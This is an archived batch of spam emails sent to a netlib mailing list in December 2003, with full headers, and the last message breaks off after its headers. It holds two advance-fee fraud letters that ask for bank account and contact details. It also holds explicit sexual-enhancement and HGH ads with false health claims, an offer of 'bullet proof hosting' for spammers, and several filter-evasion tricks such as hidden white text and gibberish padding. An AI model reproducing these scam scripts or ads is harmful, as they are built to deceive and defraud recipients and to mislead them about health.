	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id hBLFRAMO012722
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 21 Dec 2003 10:27:11 -0500 (EST)
Message-Id: <200312211527.hBLFRAMO012722@netlib2.cs.utk.edu>
From: "HERU NURWARSITO" <nuwaher@netscape.net>
Subject: SINGAPORE  URGENT
To: blast-funct-archive@netlib2.cs.utk.edu
Content-Type: text/plain;
	charset="US-ASCII"
Reply-To: her29@rediffmail.com
Date: Sun, 21 Dec 2003 16:27:19 +0100
X-Priority: 3

Heru Nurwarsito
Col (Ret) David Wong.
OCBC Bank
Singapore.
www.ocbc.com
PRIVATE AND URGENT.
I am contacting you on a business transfer of a hugh sum of money from a deceased account. Though I know that a transaction of this magnitude will make any one apprehensive and skeptical, but I am assuring you that its been accurately planned and will be carried out successfully with your full cooperation as long as you follow our plans and instructions religiously. We decided to contact you due to the urgency of this transaction.
PROPOSITION;
We discovered an abandoned sum of US$25,500,000.00 ( twenty five million five hundred thousand united states dollars) in an account that belongs to one of our foreign customers who died along with his entire family. Since his death, none of his next-of-kin or relations has come forward to lay claims for this money as the heir. We cannot release the fund from his account unless someone applies for claim as the next-of-kin to the deceased as indicated in our banking guidelines. Upon this discovery, we now seek your permission
to have you stand as a next of kin to the deceased as all documentations will be carefully worked out by us for the funds (US$25,500,000.00) to be released in your favor as the beneficiary's next of kin through my banks funds managers/clearing house overseas. It may interest you to know that we have secured from
the probate an order of mandamus to locate any of deceased beneficiaries. Please acknowledge receipt of this message in acceptance of our mutual business endeavor by furnishing me with the following;
1. Beneficiary Name and Address.
2. Direct Telephone and fax numbers.
These requirements will enable us file letter of claim to the appropriate departments for necessary approvals in your favor before the transfer can be made. We shall be
compensating you with two million dollars on final conclusion of this project, while the rest shall be for us. Your share stays while the rest shall be for us for investment purposes.
If this proposal is acceptable by you, do not take undue advantage of the trust we have bestowed in you,please contact me directly as i await your urgent mail.
Regards,
Heru.
Col. Wong

From Personnel@selu.com.ar Sun Dec 21 17:05:16 2003
Return-Path: <Personnel@selu.com.ar>
Received: from 160.36.58.108 ([218.246.229.166])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBLM57MN020760;
	Sun, 21 Dec 2003 17:05:12 -0500 (EST)
Received: from cof2.dyb7f.net ([32.97.25.75])
	by 160.36.58.108 with SMTP;
	Sun, 21 Dec 2003 22:01:22 +0000
Message-ID: <shfy007-g8346k-d@cgook.8.s58dy>
From: "Admin" <Personnel@selu.com.ar>
To: anon@netlib2.cs.utk.edu
Subject: Attention All  Staff and Personnel:
Date: Sun, 21 Dec 03 22:01:22 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C6E4D..._."

This is a multi-part message in MIME format.

--C6E4D..._.
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Staff and Personnel:

You Must Respond By 5 P.M. Tuesday, December 23, 2003

Through a special arrangement, Avtech Direct is offering a limited
allotment of BRAND NEW, top of-the-line, name-brand desktop computers
at 50% off MSRP to all who respond to this message
before 5 P.M., Tuesday, December 23, 2003.

All desktop computers are brand-new packed in their original boxes,
and come with a full manufacturer's warranty plus
a 100% satisfaction guarantee.

These professional grade Desktops are fully equipped with 2004
next generation technology, making these the best performing
computers money can buy.

Avtech Direct is offering these feature rich, top performing
Desktops with the latest Intel technology at an amazing price
to All Staff and Personnel who call:

    1-800-884-9510 by 5 P.M.  Tuesday, December 23, 2003

The fast and powerful AT-2400 series Desktop features: 

      * Intel 2.0Ghz Processor for amazing speed and performance
      * 128MB DDR RAM,  Upgradeable to 1024
      * 20 GB UDMA Hard Drive, Upgradeable to 80 GB
      * 52X CD-Rom Drive, Upgradeable to DVD/CDRW 
      * 1.44 Floppy disk drive
      * Next Generation Technology
      * ATI Premium video and sound
      * Full Connectivity with Fax modem/Lan/IEE 1394/USB 2.0
      * Soft Touch Keyboard and scroll mouse
      * Internet Ready
      * Network Ready
      * 1 Year parts and labor warranty
      * Priority customer service and tech support

MSRP $699 ........................................ Your Cost $347

How to qualify:

  1. You must be a Medical Staff Member, Teacher or Student.
  2. All desktop computers will be available on a
     first come first serve basis.
  3. You must call 1-800-884-9510 by 5 P.M. Tuesday, December 23, 2003
     and we will hold the desktops you request on will call. 
  4. You are not obligated in any way.
  5. 100% Satisfaction Guaranteed.
   
   
Call Avtech Direct
1-800-884-9510 before 5 P.M. Tuesday, December 23, 2003
--C6E4D..._.--


From benfriehl@msn.com Mon Dec 22 11:44:03 2003
Return-Path: <benfriehl@msn.com>
Received: from h-66-166-60-234.SFLDMIDN.covad.net (h-66-166-60-234.SFLDMIDN.covad.net [66.166.60.234])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBMGhsMN016418;
	Mon, 22 Dec 2003 11:43:55 -0500 (EST)
Received: from [112.58.240.16] by h-66-166-60-234.SFLDMIDN.covad.net with ESMTP id <316773-67282>; Tue, 23 Dec 2003 01:38:31 -0500
Message-ID: <5$o8p-9$-$t5ui$43-ob1$8v@0qif7c2.tl>
From: "Alejandra Temple" <benfriehl@msn.com>
Reply-To: "Alejandra Temple" <benfriehl@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Men this is what you need for life hmsia 
Date: Tue, 23 Dec 03 01:38:31 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="65C4F1.3_.."
X-Priority: 3
X-MSMail-Priority: Normal


--65C4F1.3_..
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Men this is what you need for life hmsia 
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
hxyswbfkvvgx xwaxrdsx qcmdeheov qh  s hws suxfuzuy ed
</body>
</html>
vzxtwxleazl 
nuswm 
mqmujrpi

--65C4F1.3_..--


From benfriehl@msn.com Mon Dec 22 13:41:25 2003
Return-Path: <benfriehl@msn.com>
Received: from h-66-166-60-234.SFLDMIDN.covad.net (h-66-166-60-234.SFLDMIDN.covad.net [66.166.60.234])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBMIfBMN018425;
	Mon, 22 Dec 2003 13:41:18 -0500 (EST)
Received: from (HELO g7xff6c) [210.12.230.24] by h-66-166-60-234.SFLDMIDN.covad.net; Tue, 23 Dec 2003 10:39:53 +0200
Message-ID: <72-e5-o$3$i0@lo553c87>
From: "Annette Parrish" <benfriehl@msn.com>
Reply-To: "Annette Parrish" <benfriehl@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Over and over and over she screams  qbo s
Date: Tue, 23 Dec 03 10:39:53 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="3_.E_A_EB.3_3B.4"
X-Priority: 3
X-MSMail-Priority: Normal


--3_.E_A_EB.3_3B.4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Over and over and over she screams  qbo s
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
aej kskftflbcirzmz bzzhabish
oxfv
w nvepeno  ew oefjrdj
</body>
</html>
hvur lwqr pkgooe uwsy

--3_.E_A_EB.3_3B.4--


From vl665bf@mail.com Mon Dec 22 14:36:47 2003
Return-Path: <vl665bf@mail.com>
Received: from 01 ([200.63.132.89])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBMJahMN019494
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 22 Dec 2003 14:36:45 -0500 (EST)
Received: from [176.248.213.103]
	by 01 id 5794FI841iKD
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 23 Dec 2003 19:36:32 +0200
Message-ID: <h$6gx$6b$--p5r6@lm4pv6xa>
From: "Margaret Solis" <vl665bf@mail.com>
Reply-To: "Margaret Solis" <vl665bf@mail.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: bullet proof web hosting
Date: Tue, 23 Dec 03 19:36:32 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C_35.D__D3EB72C63BEAAF9"
X-Priority: 3
X-MSMail-Priority: Normal


--C_35.D__D3EB72C63BEAAF9
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Bullet proof hosting</title>
</head>

<body>
 <p><strong>Direct marketing works!</strong> Send thousands of emails to p=
otentional customers without your web site being shutdown! </p>
 <p>Real solid and <a href=3D"http://www.autodealz.biz/bulletproof/"><stro=
ng>bullet proof hosting</strong></a> starting at only $199/month. Powerful=
 linux platforms, offshore location! New CAN-SPAM law friendly!!</p>
 <p>Sincerely,<br>
   Jeff</p>
</body>
</html>

--C_35.D__D3EB72C63BEAAF9--


From hilgobia@macmail.com Tue Dec 23 02:06:36 2003
Return-Path: <hilgobia@macmail.com>
Received: from 2mails848.com ([80.88.142.29])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBN76RMN001488
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 23 Dec 2003 02:06:30 -0500 (EST)
Message-Id: <200312230706.hBN76RMN001488@netlib2.cs.utk.edu>
From: "HILMAN EGOBIA" <hilgobia@macmail.com>
Reply-To: hilgobiang@zybermail.com
To: blast-funct-archive@netlib2.cs.utk.edu
Date: Mon, 18 Nov 2002 08:28:45 -0800
Subject: 
X-Mailer: Microsoft Outlook Express 5.00.2919.6900 DM
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id hBN76RMN001488

FROM THE DESK OF
DR HILMAN EGOBIA
OMPADEC HEAD QUARTERS
LAGOS -NIGERIA




STRICTLY CONFIDENTIAL

Dear Sir,

I am the Chief Scribe of the Newly Constituted
OMPADEC (Oil Minerals producing Area Development
Commission)

This commission was reconstituted in 1998 by the
Federal Government of Nigeria as a result of
consistent Environmental Neglect agitated by the Oil
and Minerals Producing States.

This commission received a budgetary allocation of
US$1.150 Billion for Environmental Maintenance/Management of Oil
producingstates for the
2002/2003 Fiscal Year.

In view of the present political situation in our
country, I have agreed with my colleagues to withdraw
the sum of US$35 Million (Thirty-five Million
U. S. Dollars) as an Over-Invoice of a contract we
awarded for the Environmental Maintenance.

All modalities to ensure a hitch-free transfer of
this fund into your account through the officials of
Central Bank of Nigeria (CBN) and Federal
Ministry of Finance have been properly worked out.

Note: There is no risks or dangers involved.
N/B: I have agreed with my colleagues that after the
business, you should keep 30% of the total fund; my
colleagues and myself will take 65% while the
remaining 5% is mapped out to cover the international
and local expenses that might be incurred by both
parties in the course of this transaction.

If this proposal interest you of which I hope it
would, please forward to me immediately the followings
by e-mail address above.


1. Full company's Name and Address
2. Private telephone and fax numbers
3. Your full bank name and address
4. Bank account number, account name, telephone and
fax numbers

As soon as we receive the above information's from
you, we shall immediately file up applications for
approvals and payment following.

NOTE: You must maintain the topmost confidentiality
of this transaction because we are top civil servants
who would not joke with our reputation.

Thanks.

Best Regards,

DR HILMAN EGOBIA
PLEASE SEND YOUR REPLY TO: hilgobiang@zybermail.com 




From v1xptnrau@msn.com Tue Dec 23 04:55:00 2003
Return-Path: <v1xptnrau@msn.com>
Received: from h080046176da6.ne.client2.attbi.com (h080046176da6.ne.client2.attbi.com [24.62.168.152])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBN9smMN006888
	for <blast-funct-archive@netlib2.cs.utk.edu>; Tue, 23 Dec 2003 04:54:55 -0500 (EST)
Received: from (HELO a8qdkkn) [91.91.239.149]
	by h080046176da6.ne.client2.attbi.com with ESMTP id F8DF1A0CB77;
	Tue, 23 Dec 2003 17:54:53 -0700
Message-ID: <q87---ay$-r2$145-4$4x$e@tgbsrf9y>
From: "Ingrid Manley" <v1xptnrau@msn.com>
Reply-To: "Ingrid Manley" <v1xptnrau@msn.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: We can teach you to make a fortune online... x eezwjh
Date: Tue, 23 Dec 03 17:54:53 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="CA2.D78B85__8A9072."
X-Priority: 3
X-MSMail-Priority: Normal


--CA2.D78B85__8A9072.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title></title> 
 </head> 
 <body background=3D"http://asdzxc.biz/ads2/whtbg.gif"> 
  
 <font color=3D#ffffff size=3D1>order confirmation. your order should be s=
hipped by January, via fedex.  
 your federal express tracking number is thymine.</font><font size=3D=
"1"><BR> 
 <font color=3D#ffffff> thank you for registering.  your userid is: 
 agnomen</font></font><br> 
  
  <center>
 <a href=3D"http://www.asdzxc.biz/index.php?id=3D173&affid=3D672"><img src=
=3D"http://asdzxc.biz/ads2/myab_ad1.gif" border=3D"0"> 
 </a> 
  
  <p><strong><font color=3D"#FF0000">Learn to Make A Fortune With Ebay!</f=
ont><br> 
  <font color=3D"#9933CC">Complete Turnkey System</font><br><font color=3D=
"#FF00FF"></font><strong><font color=3D"#000000"> Software - Videos - Turo=
rials</font><br>
  <a href=3D"http://www.asdzxc.biz/index.php?id=3D173&affid=3D672">
  Cl<!--eternity-->ick Here For Information</a></strong><br></p>


  
  </font> <br><br><br>
  <p></p></p> 
 <p><font color=3D"#000000" size=3D"2" face=3D"arial, helvetica, sans-seri=
f">cli<!--hydrochloride-->ck 
 <a href=3D"http://asdzxc.biz/gone.php">here</a> if you would not like to =
receive future mai<!--canary-->lings.</font></p> 
 </center> 
  
  
   </body> 
 </html>uv gsyqqp
vl
kzxoomtfxcknymwcdangiurcnqo fhokjo
 ts 
hu wcbrcpaeeph

--CA2.D78B85__8A9072.--


From advancedmedicine@msn.com Tue Dec 23 13:30:02 2003
Return-Path: <advancedmedicine@msn.com>
Received: from pcp159415pcs.mtlrel01.nj.comcast.net (pcp159415pcs.mtlrel01.nj.comcast.net [68.44.54.218])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBNIU1MN015153;
	Tue, 23 Dec 2003 13:30:01 -0500 (EST)
Received: from [107.31.22.239] by pcp159415pcs.mtlrel01.nj.comcast.net id P42v31A3m0i4; Wed, 24 Dec 2003 10:25:29 +0200
Message-ID: <y$-v$6$q02tv1$igc7815zb$7$-385@zj6srwt7nw>
From: "Robbie Vela" <advancedmedicine@msn.com>
Reply-To: "Robbie Vela" <advancedmedicine@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Secks stars reveal how they do it kc
Date: Wed, 24 Dec 03 10:25:29 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".BCC..EE.9599182"
X-Priority: 3
X-MSMail-Priority: Normal


--.BCC..EE.9599182
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Secks stars reveal how they do it kc
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
cqivt lk
jifsbq 
vn
h
f xc brvkalhwjiu
</body>
</html>
gagmig qiqs sqrtbn qvbmro
v zm crvlauoxkj

--.BCC..EE.9599182--


From advancedmedicine@msn.com Tue Dec 23 13:47:06 2003
Return-Path: <advancedmedicine@msn.com>
Received: from lafilaire-1-82-66-80-161.fbx.proxad.net (admin40@lafilaire-1-82-66-80-161.fbx.proxad.net [82.66.80.161])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBNIl3MN015441;
	Tue, 23 Dec 2003 13:47:04 -0500 (EST)
Received: from [68.62.169.166] by lafilaire-1-82-66-80-161.fbx.proxad.net; Wed, 24 Dec 2003 01:38:33 -0700
Message-ID: <2-vol6s6wx4i9-ey3r@cx92m2b7w8>
From: "Napoleon Dickson" <advancedmedicine@msn.com>
Reply-To: "Napoleon Dickson" <advancedmedicine@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Over and over and over she cried o
Date: Wed, 24 Dec 03 01:38:33 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".E.252C__.E87__7BAD_.D"
X-Priority: 3
X-MSMail-Priority: Normal


--.E.252C__.E87__7BAD_.D
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Over and over and over she cried o
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
gqkqn dnzx zl bwhpyxlynqt k  fr
</body>
</html>
icz yktseidlcgvro
 a gglis 
il
qown bfzafxfglcj bcqzvesalviuj
li gq

--.E.252C__.E87__7BAD_.D--


From zzkuyu@adelphia.net Tue Dec 23 23:20:20 2003
Return-Path: <zzkuyu@adelphia.net>
Received: from CPE0008a10fa569-CM00e06f1fba84.cpe.net.cable.rogers.com (CPE0008a10fa569-CM00e06f1fba84.cpe.net.cable.rogers.com [63.139.62.247])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBO4K5MN024155;
	Tue, 23 Dec 2003 23:20:09 -0500 (EST)
Received: from [162.234.38.17]
	by CPE0008a10fa569-CM00e06f1fba84.cpe.net.cable.rogers.com
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 19 May 2003 10:52:49 +0200
Message-ID: <rju4-$$om1w49k-nz20w0fkf@jrh.xmwqffj632>
From: "Marquita Sheehan" <zzkuyu@adelphia.net>
Reply-To: "Marquita Sheehan" <zzkuyu@adelphia.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Extreme Video Footage..  ( adult)  mwzxnzn dq
Date: Mon, 19 May 2003 10:52:49 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7___.7D589.333_.33CC7B8B"
X-Priority: 3
X-MSMail-Priority: Normal


--7___.7D589.333_.33CC7B8B
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<DIV><BR></DIV>
  <P><FONT face=3D"Arial, Helvetica, sans-serif">See the video everyone is=
 talking about<BR>This is totally Extreme!!!<BR>
  <A href=3D"http://www.geocities.com/blowjobfunz/" 
  target=3D_blank>Extreme Wild College Girls</A></FONT> </P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P>&nbsp;</P>
  <P><FONT face=3D"Arial, Helvetica, sans-serif">Ok. Stop sending me this.=
<BR><A 
  href=3D"http://www%2E%77eb%64%65%61%6Cz%2Ec%6F%6D/unlist.html">Please 
  no more</A></FONT></P></BLOCKQUOTE></BODY></HTML>s uudtlgwsunyshd bvfxpy

--7___.7D589.333_.33CC7B8B--


From youngdoctors@msn.com Wed Dec 24 00:18:59 2003
Return-Path: <youngdoctors@msn.com>
Received: from hmmt130078.catv.ppp.infoweb.ne.jp (hmmt130078.catv.ppp.infoweb.ne.jp [219.104.255.78])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBO5IrMN024788;
	Wed, 24 Dec 2003 00:18:54 -0500 (EST)
Received: from [196.194.95.208]
	by hmmt130078.catv.ppp.infoweb.ne.jp with ESMTP id <606876-92830>;
	Wed, 24 Dec 2003 17:16:33 -0200
Message-ID: <l$2722214-6-s0j2-4@z7hy.m4>
From: "Kermit Negron" <youngdoctors@msn.com>
Reply-To: "Kermit Negron" <youngdoctors@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Energy Pumped up and alive! i
Date: Wed, 24 Dec 03 17:16:33 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".7.3_11373"
X-Priority: 3
X-MSMail-Priority: Normal


--.7.3_11373
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Energy Pumped up and alive! i
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF00FF" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#FFFFFF" face=3D"verdana">Have used HGH wit=
h great success to be the best they could possibly be.<br>HGH is recognize=
d around the world as the<br> "hormone to replace"<br> to combat the adver=
se affects of aging.<br>It is a documented truth.<br>  Celebrities and pol=
iticians have used, and ARE USING,,<Br> HGH <br> to prolong their  minds,<=
br> their creative abilities, and  to prolong healthy lives.<br>HGH has be=
en proven to be "solely responsible" in the maintenance of their youthful<=
br>"movie star good looks" decades beyond those that have yet to discover =
HGH ! <br><br>Ever wonder how certain celebrities manage to look so young =
and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FFFFFF" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FFFFFF" face=3D"verdana"><a href=3D"htt=
p://www.fisha.biz/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
oetbxdknwbeky
cgihbdr
rikp m osc lopwezilnctyxtkgsf  kqtioyixue orfhyan
</body>
</html>
mzakdmks
vkrhdnizjxh ea mw duteczzlbhoe
sa isuxyt 
rli jfud ibhcltb
xudb q imp  qusbnjnnjlx
bs 

--.7.3_11373--


From youngdoctors@msn.com Wed Dec 24 00:40:08 2003
Return-Path: <youngdoctors@msn.com>
Received: from 160.36.58.108 ([213.37.119.179])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBO5dkMN024991;
	Wed, 24 Dec 2003 00:39:52 -0500 (EST)
Received: from [217.108.227.108] by 160.36.58.108 with ESMTP id <323847-66310>; Thu, 25 Dec 2003 00:38:40 +0500
